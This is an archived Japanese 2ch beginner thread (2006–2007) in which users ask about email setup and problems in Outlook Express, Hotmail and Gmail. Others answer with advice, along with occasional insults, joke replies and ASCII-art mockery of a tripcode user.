自動的に音楽は流れますか?

199 :ひよこ名無しさん:2006/08/03(木) 20:10:58 ID:+w7AS5Ae
Outlookで宛先とCCをセットにしてアドレス帳に登録する
ことってできますか?
ある宛先に送るときは必ず決まったCCをつけるのですが、
それを毎回入力する手間を省きたいのです。

200 :ひよこ名無しさん:2006/08/15(火) 16:39:40 ID:???
今まで使っていたパソコン(Win98、IE5.5、メールソフトはOE、)を買い換えて
新しいパソコン(OSはWinXP、ブラウザはIE6.0、メールソフトはOE)にしたのですが
メールのアカウント設定でサーバーの種類やサーバー名をなんと入力していいか分かりません。
メール受信もできないみたいです。どうすれば設定できるでしょうか?
インターネットはケーブル接続です。よろしくお願いします。

201 :200:2006/08/15(火) 16:40:31 ID:OzKjuZpB
すいません、sageで書き込んでました。おねがいします

202 :ひよこ名無しさん:2006/08/28(月) 18:29:26 ID:???
すみません質問しても宜しいでしょうか?
質問はメールの表示についてです。

OSはXP HomeEdition SP1、ソフトウェアはOutlook Express 6です。
受信メールが文字化けしてまして、エンコードいじっても正常に表示されません。
その相手のメールのみが文字化けしてるんですが、こちらに問題はありますでしょうか?
直前の作業などは特にありません。PC起動してすぐにメーラー起動しましたんで。
送られてきたメールの一部ですが

>>これからw)「發ノ佞X腓い・世気譴亶・い任垢茵寇タ鹿粡・丘梹粢柾凾タそれでは!

こんな感じでした。たぶん「これからもよろしく〜」な感じで送ったんだと思います。

よろしくお願いします。


203 :ひよこ名無しさん:2006/08/31(木) 01:44:49 ID:Vk+KVBVt
よろしくお願いします。

XP HomeEdition SP2
Outlook Express 2003
を使っています。

メールの受信は出来るのですが、送信しようとすると501エラーとやらが出て送信出来ません。
どうしたらいいでしょうか?

204 :ひよこ名無しさん:2006/09/05(火) 18:24:02 ID:+p5ny97j
無線LANでインターネットをしているのですが、メールはできるのでしょうか?
できるなら、なにかに登録しなくてはいけないのでしょうか?教えてください。お願いします。

205 :ひよこ名無しさん:2006/09/05(火) 19:58:21 ID:???
>>204
無線LANだろが、有線LANだろうが、メールは出来る。
メールソフトの設定は必要。プロバイダのサポートページ参照。

206 :ひよこ名無しさん:2006/09/06(水) 02:27:07 ID:???
test

207 :ひよこ名無しさん:2006/09/07(木) 16:13:32 ID:slNesMcR
OutlookExpressなんですが、友人やお知らせのメールが何故か三通ずつ届きます。
試しに自分でも携帯からパソコンにメールしたら同じメールが三通きました。
それからしばらくしたらこちらからメールが送れなくなりました。
どうしたらいいでしょうか?

208 :ひよこ名無しさん:2006/09/12(火) 10:11:44 ID:CRmI+UuQ
WinXPでOutlook Expressを使用しています。
エラー番号0x800ccc92でパスワードを何度入れても拒否されます。
アカウントもパスワードも間違えていないのに駄目です。
どのように解決したらよいのか、お願いします。

209 :ひよこ名無しさん:2006/09/12(火) 10:16:24 ID:???
>>208
半角全角大文字小文字に気を付けてもう一度パスワードを確認
それでダメならプロバイダに訴える

210 :ひよこ名無しさん:2006/09/12(火) 10:21:26 ID:CRmI+UuQ
>>209
ありがとうございます。やってみます。

211 :ひよこ名無しさん:2006/09/12(火) 10:24:45 ID:CRmI+UuQ
>>209
駄目でした…プロバイダに電話します。

212 :ひよこ名無しさん:2006/09/12(火) 10:47:35 ID:eAWfKuPZ
質問です。
msnのhotmailをアウトルックエクスプレスで
受信したいです。どうやって設定したらいいでしょうか。
XPでIE6.0です
お願いいたします


213 :ひよこ名無しさん:2006/09/12(火) 10:48:39 ID:???
>>212
マルチすんなクソボケ

214 :ひよこ名無しさん:2006/09/12(火) 10:49:10 ID:???
>>212
パソコン初心者総合質問スレッド Vol.1428
http://pc7.2ch.net/test/read.cgi/pcqa/1157947742/999

999 名前:ひよこ名無しさん[] 投稿日:2006/09/12(火) 10:41:55 ID:eAWfKuPZ
質問です。
msnのhotmailをアウトルックエクスプレスで
受信したいです。どうやって設定したらいいでしょうか。
XPでIE6.0です
お願いいたします

215 :ひよこ名無しさん:2006/09/12(火) 10:57:26 ID:eAWfKuPZ
スレが終わっちゃったんで
こっちに書きました
すみません

216 :ひよこ名無しさん:2006/09/15(金) 03:42:53 ID:???
OE6で受信したメールの、ハイパーリンクをクリックしても何も動作しないんだが、
どこで設定するんだ?

217 :ひよこ名無しさん:2006/09/20(水) 20:19:47 ID:jCxpqzRp
擦蕕譴・・鹿粡・梹粢柾凾タ
これなんと読みますか?

218 :ひよこ名無しさん:2006/09/21(木) 16:01:20 ID:cW6lWC71
OE6で送信したメールが急に送信済みに保存されなくなったんですけど、教えてください。

ちなみに、コピーを保存する には、チェックついてます。
お願いします。

219 :ひよこ名無しさん:2006/09/21(木) 17:15:02 ID:???
>>218
マルチ良くない

220 :ひよこ名無しさん:2006/09/26(火) 13:41:26 ID:rAiToCm4
ホットメールを先ほど設定したのですが
試しにOutlook Expressに送ったら送信者の所に本名が出てしまうんですが
アドレスだけだすにはどうすればいいですか?

221 :220:2006/09/26(火) 15:15:59 ID:rAiToCm4
解決しました。

222 :ひよこ名無しさん:2006/09/30(土) 13:52:36 ID:8i88m6MZ
Outlookで動画を送りたいんですが、どのくらいのサイズまで送る事が出来ますか?

223 :ひよこ名無しさん:2006/09/30(土) 14:07:51 ID:???
>>222
環境による

224 :ひよこ名無しさん:2006/09/30(土) 14:29:51 ID:8i88m6MZ
環境はXPです。Outlookは6です。わかりますか?

225 :ひよこ名無しさん:2006/09/30(土) 14:32:51 ID:???
>>224
その環境じゃない
契約しているプロバイダによって違う
あとは自分で調べてくれ

226 :ひよこ名無しさん:2006/09/30(土) 14:50:26 ID:8i88m6MZ
プロバイダはDTIです。他に分かる人いましたらお願いしまーす。

227 :ひよこ名無しさん:2006/09/30(土) 14:51:12 ID:???
>>226
ウイルスです。

228 :ひよこ名無しさん:2006/09/30(土) 15:10:37 ID:FvOl1dmj
yahooメールを使っているんですが、yahoo以外の
@xxne.jp、@mail.goo.ne.jpなどから送受信って出来ますか?

229 :ひよこ名無しさん:2006/09/30(土) 15:22:35 ID:???
>>228
もちろん

230 :ひよこ名無しさん:2006/09/30(土) 16:11:42 ID:???
>>229
お答え頂きありがとうございます。

231 :ひよこ名無しさん:2006/09/30(土) 16:31:40 ID:8i88m6MZ
ここ使えないな

232 :ひよこ名無しさん:2006/09/30(土) 16:37:57 ID:???
>>231
またきたのか?
Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。

233 :ひよこ名無しさん:2006/09/30(土) 18:36:23 ID:???
>>231
日本語が理解できない方には難しいかもしれません

234 :ひよこ名無しさん:2006/10/07(土) 14:31:53 ID:accI6g+Q
自動で送られる返信メールについて質問です
最近海外の無料の会員(あやしいのじゃないです)サイトの会員になりたくて
会員登録したのですが、自動でくる返信が返ってこないのです
以前一度登録したので、返ってくるはずなんです(以前のはデータがとんで、失くしてしまったので
最近再登録してるんです)
こういう場合どうしたらいいんでしょうか?
サイト主は変な質問を避けたいのか、連絡取れるようにしてないですし
掲示板も会員でないと見ることも書くこともできないんです

いろいろ調べてみると、スパムメール対策が関係してるのかなって思ってます。
最近の自分のメールを見ると、日本のスパムメールは来るのですが
海外からのメールが一切来ないのです
それが分かったところで、どう対処していいのか分からず途方にくれています
どなたかお助けください、よろしくお願いします

235 :ひよこ名無しさん:2006/10/07(土) 18:54:52 ID:CJ2L05Ag
削除済みアイテムフォルダの中にある、未開封のメールだけを一括で削除する方法ってありますか?
XPproSP2でOutlookExpress6です

236 :ひよこ名無しさん:2006/10/07(土) 18:57:12 ID:???
>>235
ブロードバンド買ってください。

237 :ひよこ名無しさん:2006/10/08(日) 22:41:26 ID:CAtckAwO
WinXPで、Outlook Expressを使ってます。
メールにExcelで作った書類を添付して相手に送りますが、
添付を開くのを1回限りに設定することは出来るでしょうか?

238 :ひよこ名無しさん:2006/10/08(日) 23:07:40 ID:???


     / ̄ ̄ ̄ ̄ ̄ ̄ ̄\ 
    | ○。         |
    ノノ)            从
   ( i从〓〓      〓〓.从
   .从-=・=-      -=・=-从
  从从.        l       从)
  (从.l∴      ∨     ∴从人)
 (人人|∴ ヽ  .ー===-' ./.∴..从人)  <無職私立の中学生 ◆N30ctwWJLw蚤
 (人人|∴∴!    ̄   !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)
..(人人人_人____人_.人人人)
〔ノ二二,___       __,二二ヽ〕
 |:::::::::::::::::::::::::ヽ゜   ゜/:::::::::::::::::::::::::/
 〉::::::::: :::::::::::::〉__∩__〈:::::::::::::: ::::::::〈 
 |:::::::::::::::::::::::/\ ̄/ヽ:::::::::::::::::::::/
〔:::::::::::::::::::::/  ノ ~ヽ  ヽ::::::::::::::::::|
ヽ:::::::::::::::::/ /:::::::::::: \ ):::::::::::::::::::ゝ
ノ:::::::::::::::::::| |_〜─ー= - | |〜〜〜/

239 :ひよこ名無しさん:2006/10/08(日) 23:58:09 ID:EETg73rF
質問です
今までヤフでメールの送受信をしてたのですが受信箱がなにかの拍子に
全て消えてしまいました OEには受信メールが残ってるので
OEから受信メールを移すことはできないでしょうか?

240 :ひよこ名無しさん:2006/10/11(水) 14:06:14 ID:J0XxeerZ
OS:WinXPホームエディション 
メールソフト:アウトルックエクスプレス 
フリーのメールアドレス作ったんだけど送信は出来るんですが受信が出来ません
アカウントや受信サーバーを何書いていいか分からなかったので
契約したプロバイダのと一緒にしたのがダメなんですかね?


241 :ひよこ名無しさん:2006/10/11(水) 14:06:58 ID:???




    やる事2ちゃんだけ無職私立の中学生 ◆N30ctwWJLw蚤
           ↓

          ______
         /:::::::::::::::::::::\
       /::::::::::::::::::::::::::::::::\
       |::::::::::::::::       | 
       |::::::::::::::: ∪ ⌒  ⌒)
       |::( 6::     `  ´ |
        ノ::: (∵∴∪ ( ・ ・))   ゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜゚・*
     /      ∵   3 丿   ボクやる事2ちゃんで粘着自演だけだよっぷ ・・・・・・・・
    /\    U   ___ノ         *・゜゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜
  /   .\     ____ノ\
        \______ノ  .\


242 :ひよこ名無しさん:2006/10/12(木) 15:36:09 ID:???
>>240
>契約したプロバイダのと一緒にしたのがダメなんですかね?

ダメです、っていうか、意味無し

フリーのアカウントとった所に設定方法載ってるはず

243 :ひよこ名無しさん:2006/10/16(月) 12:24:40 ID:fesRiR30
outlookなんですが、サイズが大きい為自動的に
何通かに分割して送られてきたメールがばらばらなままで復元されません。
どうすればひとつになりますか?
どなたか教えて下さい!



244 :ひよこ名無しさん:2006/10/16(月) 12:38:56 ID:???
>>243
メッセージ→まとめてデコード

245 :243:2006/10/16(月) 13:33:58 ID:???
>>244
ありがとうございます。しかしメニューバーに「メッセージ」がありません。
メッセージを右クリックしても「まとめてデコート」というメニューが
出てこないし・・・。Outlook Expressの方にはあるみたいですけど
Outlookにはないんでしょうか・・・

246 :ひよこ名無しさん:2006/10/16(月) 13:46:12 ID:???
>>245
ああごめん。OutlookExpressじゃないとダメ。
(古いバージョンのOutlookはいいんだったかも)
送り主に文句を言って下さい。

247 :243:2006/10/16(月) 13:50:39 ID:???
そうでしたか。残念だけどすっきりしました!
即レスありがとうございました。

248 :ひよこ名無しさん:2006/10/28(土) 14:33:33 ID:2mjSsV4F
WinXPで、Outlook Expressを使ってます。
先日、独自ドメインのメールアドレス(info@****.jp)に、送信者名も、宛名も無い空欄のメールが届きました。
プロパティの詳細を見ると、自分のアドレスに何か付け加えていました。
表面上、何も表示をさせない方法って有るのですか。
文書は英語で書いてあって、URLも記入されていました。
どうやら、海外のレンタルアドレスのPRのようでしたが、送信元の偽装等簡単に出来る物ですか?。
今までに、自分のアドレスで届いた事は有りますが、今回のように送信欄が空白なのは初めてでした。
その様な偽装が簡単に出来るのか教えて下さい。
海外だから、@以降が判るとは疑問です。

249 :ひよこ名無しさん:2006/10/28(土) 18:43:27 ID:KChcLiOu
全くお恥ずかしい話ですが、親父なので海外へメールする方法が判りません。
相手はフィリピンでドメインはyahoo.comです。こちらはフリーのアドレスでyahoo.co.jp
です。送るとすぐに、エラーのメールが送られてきます。ただのアドレスでは海外へメール出来ないのでしょうか?
それに他の人はその相手のメールアドレスで、メールが出来るんですが。
こちらのアドレスが悪いんでしょうか。それとも、なんかセキュリティーでも掛かっているんでしょうか?教えてください。




250 :ひよこ名無しさん:2006/10/29(日) 12:31:35 ID:CO5e8nGH
XPで今はEdmaxを使っています。
OSを再インストールしたときにメールや設定情報が消えてしまうのが嫌で
インストールしない(レジストリを使わない、というのでしょうか、ファイルを置くだけで使えるというのでしょうか)
ソフトにしようとしてこれにしています。
Gmailに移行するためSSL対応のメーラーにしようと思うのですが、そういうもので上述のような、置くだけで使えるメーラーってないでしょうか?

251 :ひよこ名無しさん:2006/10/31(火) 20:29:57 ID:???
WindowsXPを使っています。オンラインショッピングをしたいんですけど、その際にメールアドレスを入力する欄があるのですが…いままでパソコンでメールをしたことがないし、現在のアドレスが分かりません。メールアドレスの表示方法や設定の方法など詳しく教えてください。ドシロウトですみませんm(_ _)m

252 :ひよこ名無しさん:2006/11/01(水) 18:13:12 ID:???
>>248
ウイルス感染してる

>>249
アドレス間違ってる
もう一度ちゃんと確認を

>>251
プロバと契約した時にアドレス送られてきてないか?
設定法の説明書か何かあるはず
メーラーの設定は?種類は?

253 :ひよこ名無しさん:2006/12/11(月) 05:35:56 ID:Yt39zR6R
どなたか海外メールをよくしていらっしゃる方
質問させてください。

outlookから、海外の知り合いにメールを送ったのですが、
下のようなメッセージが返ってきました。これは
送られていないって事ですか? また、そうだとしたら
理由は何でしょうか? どう対処したらよいかわからず、
困っています。アドバイス頂きたく、どうぞよろしくお願いします。

以下がその文です。アドレスは●で伏せています。


**********************************************
** THIS IS A WARNING MESSAGE ONLY **
** YOU DO NOT NEED TO RESEND YOUR MESSAGE **
**********************************************

----- Transcript of session follows -----
<●●●●●@tiscail.co.uk>... Deferred: Connection refused by internal.mail.telinco.net.
Warning: message still undelivered after 4 hours
Will keep trying until message is 3 days old

254 :ひよこ名無しさん:2006/12/11(月) 05:41:20 ID:???
>>253
キンタマです。

255 :ひよこ名無しさん :2006/12/11(月) 05:55:59 ID:???
>>254
んなわけがねーだろ。

256 :ひよこ名無しさん:2006/12/11(月) 16:53:34 ID:???
>>253
マジレスです。

そのメッセージは、中継点であるsendmail(メールプログラム)が
次の中継点に送ろうとした時に障害が出て(原因不明)、送り待ちで
一定以上の時間を経過した時に返してくる典型的なメッセージです。
別に、昔から珍しくもない。

4時間送れていない?根気ないですな、たかが4時間程度で。3日たつ
まで頑張ってみると向こうは言ってます。普通1週間頑張るだろ。

考えられる原因は、internal.mail.telinco.netが落ちてるってこと
です、最低過去4時間。海外の企業相手なら、平日なら24時間、
週末なら48時間以上待ってもいいんじゃないかな、騒ぐのは。

257 :ひよこ名無しさん :2006/12/11(月) 18:53:41 ID:???
>>256

ありがとうございます! では、こちら側の不手際で
起こっている事では無いんですね。
もし、最終的に送れなかった場合、または送れた場合、
なにかしらのメッセージは再度くるんでしょうか?

258 :ひよこ名無しさん:2006/12/11(月) 19:26:55 ID:ECga47ts
本当に初心者で初歩的な質問なんですが・・・

outlookへの攻撃者のホニャニャラが見つかったので、と毎日マイクロソフトから
インストールをと画面の右下にでます。
毎回やってるんですがそれでも毎日続くんですが、これはどこが問題なんでしょう・・?

それと、急にメールが受信トレイではなくて、削除済みアイテムのフォルダへ最初から入るようになりました。
これも困るのでなんとかしたいのですが、どうしても変更の仕方がわかりません。

どなたか分かる範囲で構いませんので教えて下さい。

259 :256:2006/12/11(月) 21:13:20 ID:???
>>257
最終的にダメだった場合は、「散々頑張ったけど、ダメだったよ」と
エラーメール報告が帰ってくるはずです。

260 :ひよこ名無しさん:2006/12/11(月) 23:59:45 ID:XJwCclBC
使用OS:WinXP SP1
使用ソフト:Outlook Express 6

送受信する時にPOP3にログオンするためのパスワードが突然認識されなくなりました。
パソコンの設定は全く変えてませんし、自分以外パソコンに触ってません。
念のためにパソコンのアカウントの設定を
エクスポートしたファイルを入れ直してみましたが効果がありませんでした。
送受信すると「認証中」か「メッセージをチェックする」と表示が出たまま
タイムアウトしてしまいます。タイムアウトまでの時間を長くしてもダメでした。

メールをまともに受信するにはどうしたらいいでしょうか?


261 :ひよこ名無しさん:2006/12/12(火) 01:02:57 ID:???
>>260
ノートン入れてない?
入れてるなら一度ノートン切って受信

262 :260:2006/12/12(火) 17:29:21 ID:???
バスター入れてたので切ってもだめでした。
今日鯖に電話したらメール鯖にエラー起こってたみたいです。
スーパーハッカーはいませんでした…よかったー。
>261さんレスありがとう!

263 :ひよこ名無しさん:2006/12/19(火) 14:52:52 ID:Rtx+Zcd+
★使用OS 「w2k SP4」
★使用ソフトウェア 「outlook express 6」

【状況】
あるネットショップのメルマガ配信メールを選択するとメーラーだけフリーズを起こす。

■通常利用しているプレビューウインドウありでの状況
・ワンクリックで選択、ダブルクリックで開封という設定。
・プレビューがある状況で問題のメールをワンクリックするとoutlookがフリーズ。
・削除しようと思ってもフリーズにより削除できない。
・そのメールを直接選択せずに、上下にあるメールに挟み込む形でshiftキーを
 利用した複数選択による削除を試みるも、それでもoutlookがフリーズ。
・フリーズするのはoutlookのみで、他のソフトは利用できる。
・タスクマネージャで確認するとCUPの使用率はoutlookexpressのMSIMN.exeが99%
 使用になっている。そして、outlookの表示は「応答なし」。もちろん、元凶のメールを
 選択するまではMSIMN.exeは0%で、system Idol Processがほぼ100%。

■レイアウト変更しプレビューウインドウを無くして削除を試みる
・ワンクリックで選択しても、5秒ほどフリーズするが動かせるように回復する。
・そのまま右クリック削除を試みると、ポインタが砂時計になりしばらく固まるが
 復帰する。しかし、削除をしたのに削除はできていない。
・ワンクリック選択後deleteキーによる削除を行うが、同上で削除できない。
 そのまま何事もなかったかのように、メールは受信フォルダにあるままになる。

上記のような状況になっています。PCの再起動などは試しました。
問題のメールを削除したいのですが、ご指南よろしくお願いしますm(_ _)m

264 :ひよこ名無しさん:2006/12/31(日) 12:13:18 ID:HaXG8LKg
エキサイトのスレが落ちているのでもうここしかありませんお願いします。

bb.exciteのメールアドレスが1月頃に変わるらしく。
その説明はサイト上に書かれているのですが
popメールとwebメールがあると思うんです普通。
変更後のその違いが書かれていません。
【現在】
popメール→◯◯@bb.excite.co.jp
webメール→◯◯@excite.co.jp
【変更後】
popメール→◯◯@◯◯.excite.jp
webメール→?
(恐らくpopメールがこのようになる、じゃwebメールは?)
変更後のwebメールがどうなるのか教えてください。

265 :395:2006/12/31(日) 16:11:58 ID:EyzSjyVt
度々御免なさいデス。
>>397
[**.avi]
AVI2.0 352x240 24Bit DivX 5.0.3 Beta 24.00fps 2546f 945.93kb/s
MPEG1-LayerIII 48.00kHz 128.00kb/s CBR Stereo
[RIFF] 00:01:46 (106.08sec) / 14,417,920Bytes
真空波動研Lite 061209 / DLL 061209
の動画ですケド、

DivX for Windowsというのをインストールで動画再生できたんですけど、
DivX Converter,DivX Content Uploader,DivX Webplayerはべつにインストールしな
くてもいいんでしょうか?? DivX CodecとDivX Playerだけで普通に
再生されてるんですけど。。。。再生だけできればいいと思ってるんですけど。。。

266 :ひよこ名無しさん:2007/01/04(木) 10:52:05 ID:zZxbRmkc
他スレから誘導されました。


今まで全てのメールをヤフーのアドレスで送受信していたのですが、
迷惑メールがひどくなってきたので変更を考えています。

Yahooのセーフティアドレスというものがあることは分かったのですが、
すでにメインのアドレスに迷惑メールが来ているので無理。ですよね?

で、Yahooのアドレスは完全に消去して、Gmailに乗り換えることを考えているのですが、
Yahooのアドレスと比べて不便な点はありますでしょうか?

基本的にはOutlookでの閲覧がメインで、Web上ではあまり見ないと思います。
Gmailで一番気になっているのはフリーなので登録できないケースがあるのではないか、と思っています。

わかりにくくて申し訳ありませんがアドバイスお願いします。

267 :ひよこ名無しさん:2007/01/04(木) 11:17:22 ID:???
>>266
いまのところ全ての面においてYahoo!よりGmailのほうが上

268 :ひよこ名無しさん:2007/01/04(木) 11:34:16 ID:zZxbRmkc
>>267
Hotmailは時々登録できないことがありますが、Gmailは大丈夫でしょうか?
この先数年メインで使うことになると思うので・・・

269 :ひよこ名無しさん:2007/01/04(木) 21:26:30 ID:???
>>268
やってみなければわからない

270 :経営学部の学生 ◆2H3Xipoq6Y :2007/01/04(木) 22:18:16 ID:???
>>268
ヤフーのメールアドレスをGmaiで使うこともできます。
Gmailにログイン後、「設定」→「アカウントの設定」→「他のメールアドレスを追加」からどうぞ。

※注意
ヤフーのメールアドレスに届いたメールは全部Gmailに転送するように設定する必要があります。

271 :ひよこ名無しさん:2007/01/06(土) 13:56:37 ID:TYjDA86C
 
 メールサーバ未実装(!)プロバイダ「ASAHIネット」
 ASAHIネット はもうダメぽ!

 eメールの送受信可能な時間帯は、午前10時〜午後6時まで!
 それ以外の時間帯はメールの送受信とも ほ ぼ 不 可 能 
 送れれば超ラッキー!! 宝くじ以上の確率!!

 普通に電子メールを使いたいなら ASAHIネット はオススメしない。
 
 世の中に電子メールを送れるプロバイダは山ほどあるのだから、
  ASAHIネット だけは や め と け

電子メールサービス未実装(!)プロバイダ「ASAHIネット」
https://asahi-net.jp/
 

272 :ひよこ名無しさん:2007/01/19(金) 23:09:26 ID:++9BMq8c
WindowsXP OutlookExpress6
メール内に記載されているHPアドレスをクリックしてもIEが開かない
のは何故でしょうか?

273 :ひよこ名無しさん:2007/01/28(日) 18:33:27 ID:u5z8ymUG
ホットメール使ってメールしたら、
相手先には自分の宛先のところの名前が文字化けした状態で送られています。
設定変更するにもどうしたらいいかわかりません。

ご存知の方いらっしゃいますでしょうか?


274 :教えたい人:2007/01/28(日) 18:36:49 ID:ZxceXNF6
>>272
それってWEBサーバー側に問題があること多いよ
そのURLをコピーしてIEのアドレスバーに直接ペーストして移動したら
見れない?

>>273
それってブラウザから送信してそうなるの?

275 :273:2007/01/28(日) 18:48:31 ID:u5z8ymUG
>>274
ホットメールのサイトから直接送信しています。

回答が場違いでしたらすいません


276 :教えたい人:2007/01/28(日) 18:52:41 ID:ZxceXNF6
>>275
誰に送ってもそうなるのなら、あなたのブラウザの設定に問題あるし
一定の人にだけそうなるならあいてのPC に問題がある可能性あるし
どう?


277 :273:2007/01/28(日) 18:53:22 ID:???
宛先欄がこんな文字になってます

宛先: 鬮伜ョ・邏比ケ

278 :教えたい人:2007/01/28(日) 18:56:04 ID:ZxceXNF6
>>277
あー それはブラウザの上にある表示でエンコード選んで
日本語(自動選択)押して日本語(シフトJIS)に戻したら
治らないか?

279 :ひよこ名無しさん:2007/01/28(日) 19:08:22 ID:???
メールとメーラーに関する質問は受け付けるのに、
メーレストに関する質問は受け付けてくれないのか?

差別じゃないのか?

280 :教えたい人:2007/01/28(日) 19:11:19 ID:ZxceXNF6
>>279
メーレストッテナンダヨ
レス番何番の人ナノサ

281 :277:2007/01/28(日) 19:11:31 ID:???
ご回答ありがとうございました。
とりあえず次回からこの設定でやってみます。

282 :ひよこ名無しさん:2007/02/01(木) 18:44:32 ID:N3OKR8Ds
すみません質問です
とある方にメールを出したところ
Delivery Status Notification (Delay)というタイトルの
メールが送られてきました。
文章が英語で書かれており最後にその方のメアドが載ってました
翻訳にかけて調べたんですが警告だとか
あまりいい言葉が見当たりませんでした。あと翻訳サイトでの翻訳なので
はっきり意味がわかってきません
よかったらこれってどういう意味だか教えてください

283 :ひよこ名無しさん:2007/02/01(木) 19:52:48 ID:???
>>282
ttp://support.microsoft.com/kb/882944/ja

284 :ひよこ名無しさん:2007/02/01(木) 20:58:05 ID:???
>>283
ありがとうございました
早速読んで確認したいと思います

285 :ひよこ名無しさん:2007/02/04(日) 14:01:09 ID:XtN0W+bh
>>278
治りませんorz

286 :ひよこ名無しさん:2007/03/01(木) 00:44:54 ID:1ojnzfT/
教えてエロイ人
XPpro
サーバのVer等は知りませんが、MSExcangeServerを利用した会社のメールあどれす
Outlock使いにくいのでほかのメーラーを使いたい。
しかしExcangeServerを利用できるメーラーってあるのでしょうか?
お勧めあったら教えてください、フリーソフトなやつで。

287 :ひよこ名無しさん:2007/03/01(木) 21:15:58 ID:???
メールとメーラーがあるのにメーレストがないのは不公平だよな。
そういえば、小森のおばちゃまって今なにしてるの?
塩沢トキさんとかも。

95 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)